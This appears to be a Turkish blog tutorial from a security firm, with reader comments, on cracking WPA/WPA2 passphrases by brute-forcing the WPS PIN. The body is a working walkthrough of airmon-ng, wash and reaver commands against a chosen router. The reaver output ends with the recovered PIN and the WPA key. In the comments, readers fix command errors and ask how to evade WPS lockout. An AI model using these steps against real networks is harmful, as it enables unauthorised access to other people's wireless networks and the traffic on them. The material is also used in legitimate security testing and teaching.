WPS Destekli Kablosuz Ağların WPA/WPA2 Parolasını Kırmak
WPS (Wi-Fi Protected Setup) teknolojisi, kablosuz ağın güvenlik ayarlarını kolayca ayarlamak için kullanılan esnek bir teknolojidir.
Kablosuz ağ cihazını yapılandırırken, üzerinde bulunan PIN numarası ile cihazın yapılandırılmasını sağlar.
Saldırgan, WPS’de bulunan güvenlik zaafiyeti ile bu PIN numarasını tahmin ederse WPA/WPA2 anahtarını ele geçirebilir. WPA/WPA2 anahtarı ne kadar karmaşık ve uzun olursa olsun, PIN numarası tahmin edildiğinde anahtar elde edilebilir.
Örnek Uygulama
Bu işlemleri yapmak için, ağ kartının monitor modu desteklemesi lazım.
# airmon-ng start wlan0
Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!PID Name
976 dhclient3
2077 dhclient
2134 dhclient3
Process with PID 2134 (dhclient3) is running on interface wlan0Interface Chipset Driver
wlan0 Ralink RT2870/3070 rt2800usb – [phy0]
(monitor mode enabled on mon0)
WPS destekli kablosuz ağları bulmak için,
# wash -i mon0 -C
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
BSSID Channel RSSI WPS Version WPS Locked ESSID
—————————————————————————————————————
00:88:11:66:99:11 1 -69 1.0 No ANGARA
00:22:6B:F1:33:2E 9 -39 1.0 No BGA
88:FF:11:99:77:33 11 -56 1.0 No SECLABS_Network
00:22:66:11:49:AA 11 -72 1.0 No BGAKADEMIS
I
Hedefimizde “BGA” kablosuz ağı var, bu cihazın BSSID değerini ve yayın yaptığı kanal numarasını not edelim.
BSSID = 33:22:55:22:11:2F
CH = 9
# reaver -i mon0 -b 33:22:55:22:11:2F -c 9 -vv –no-nack -d 5 -f -x298
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>[+] Switching mon0 to channel 9
[+] Waiting for beacon from 33:22:55:22:11:2F
[+] Associated with 33:22:55:22:11:2F (ESSID: BGA)
[+] Trying pin 47128211
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 9 seconds
[+] WPS PIN: ‘47128211’
[+] WPA PSK: ‘benimgizliparolam876!#’
[+] AP SSID: ‘BGA’
[+] Nothing done, nothing to save.
Modemin WPS özelliği kapalıda olsa, saldırı başarılı olabiliyor. Teorik olarak WPS PIN numarasını tespit etmek maksimum 10 saat sürüyor, pratikte bazı özel durumlarda hedef kablosuz ağa bağlantılar zaman aşımına uğrayabilir ve bu zaman uzayabilir.
Yazar:
Ozan UÇAR
ozan.ucar@bga.com.tr
(49) Yorum
Bu konunun en güncel kali sürümü ile revizyon edilmedi gerektiğini düşünüyorum
wash -i mon0 -C komutundan sonra imleç sürekli yanıp sönüyor ama hiç ağ bulamıyor???
Yuzde 90 da kalir tabi cunku messanger 2 aliyor masanher 4 almiyor almadi icin ilk 4 hane bulamiyor diger 4 hane denicn yani son 4 hane bu cözumle hepsini kirarsin bu programlar yapmaz bunu
bir soru daha 🙂 daha önce modemlerin mac adreslerinin son altı hanesi wps pini veriyordu şimdi wps kilitlemeli modemlerin mac adreslerinden gerçek wps pin elde edilemiyor, ortaya çıkan wps pinler hep yanlış oluyor. deneme yapıp modemi kilitlemeden wps yi öğrenmenin başka yolu yokmu?
merhaba modemlerin belirli bir pin wps pin denemesinden sonra wps modunu kapatmasına hala bir çözüm bulunmadımı?
merhaba modemlerin belirli wps pin denemesinden sonra wps yi kapatmasına hala bir çözüm bulunmadımı?
Kali 2'de mon0 yok, wlan0mon olarak görmeniz normal.
yukaridaki komutta mon0 yazan yerleri wlan0mon ile degistirin
airmon-ng start wlan0 komutunda yukaridaki ciktigi aldigin icin once airmon-ng check kill komutunu girip calisan uygulamalari kapatin daha sonra airmon-ng start wlan0 komutunu girin. sorun cozulecektir.